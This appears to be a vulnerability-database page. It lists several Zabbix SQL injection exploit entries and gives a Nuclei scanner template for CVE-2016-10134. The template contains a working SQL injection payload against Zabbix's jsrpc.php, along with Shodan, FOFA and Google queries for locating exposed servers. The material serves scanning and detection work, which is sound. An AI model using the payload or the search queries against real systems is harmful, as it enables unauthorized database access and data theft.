| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for SQL Injection in Zabbix | 15 Apr 2021 20:29 | – | gitee |
| Exploit for SQL Injection in Zabbix | 8 Jun 2021 21:12 | – | gitee |
| Exploit for SQL Injection in Zabbix | 20 Mar 2022 16:48 | – | gitee |
| Exploit for SQL Injection in Zabbix | 24 Nov 2022 19:58 | – | gitee |
| Exploit for SQL Injection in Zabbix | 18 Feb 2023 14:38 | – | gitee |
| Exploit for SQL Injection in Zabbix | 22 Jan 2021 12:57 | – | gitee |
| Exploit for SQL Injection in Zabbix | 8 Apr 2022 11:20 | – | gitee |
| Exploit for SQL Injection in Zabbix | 16 May 2021 15:40 | – | gitee |
| Exploit for SQL Injection in Zabbix | 20 Mar 2021 15:17 | – | gitee |
| Exploit for SQL Injection in Zabbix | 6 Jul 2021 13:18 | – | gitee |

```yaml
id: CVE-2016-10134

info:
  name: Zabbix - SQL Injection
  author: princechaddha
  severity: critical
  description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134).
  reference:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
    - https://support.zabbix.com/browse/ZBX-11023
    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
    - http://www.debian.org/security/2017/dsa-3802
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-10134
    cwe-id: CWE-89
    epss-score: 0.86228
    epss-percentile: 0.99419
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve2016,cve,zabbix,sqli,vulhub,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error in query [INSERT INTO profiles (profileid, userid'
          - 'You have an error in your SQL syntax'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c9e17623487a6f8196e1db15bf6accedf340b532124c944d72adbd1a8048f8b902207e84dc7302176c6112b80259863cfc33b817046e0c87d4a95c8eb4a04adcceba:922c64590222798bb761d5b6d8e72950
```